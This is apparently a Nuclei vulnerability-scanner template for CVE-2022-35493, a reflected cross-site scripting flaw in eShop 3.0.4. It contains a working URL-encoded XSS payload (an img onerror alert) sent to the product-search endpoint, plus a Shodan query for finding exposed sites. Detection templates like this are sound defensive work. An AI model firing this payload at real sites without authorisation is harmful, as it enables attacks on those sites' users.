nuclei-templates/http/cves/2022/CVE-2022-35493.yaml

51 lines
1.9 KiB
YAML

id: CVE-2022-35493
info:
name: eShop 3.0.4 - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
eShop 3.0.4 contains a reflected cross-site scripting vulnerability in json search parse and json response in wrteam.in.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the website.
remediation: |
To remediate this issue, the application should implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
reference:
- https://github.com/Keyvanhardani/Exploit-eShop-Multipurpose-Ecommerce-Store-Website-3.0.4-Cross-Site-Scripting-XSS/blob/main/README.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-35493
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-35493
cwe-id: CWE-79
epss-score: 0.00133
epss-percentile: 0.48217
cpe: cpe:2.3:a:wrteam:eshop_-_ecommerce_\/_store_website:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: wrteam
product: eshop_-_ecommerce_\/_store_website
shodan-query: http.html:"eShop - Multipurpose Ecommerce"
tags: cve,cve2022,eshop,xss,wrteam
http:
- method: GET
path:
- '{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E'
matchers-condition: and
matchers:
- type: word
words:
- 'Search Result for \"><img src=x onerror=alert(document.domain)>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a0047304502207102832b43107bb5bff65f98566e7cf997252aceb849e5ccbef55eda69dfb8a0022100f2d4db5872f9feaef38c470adf89c2c97d341384798143273b07668d1286097c:922c64590222798bb761d5b6d8e72950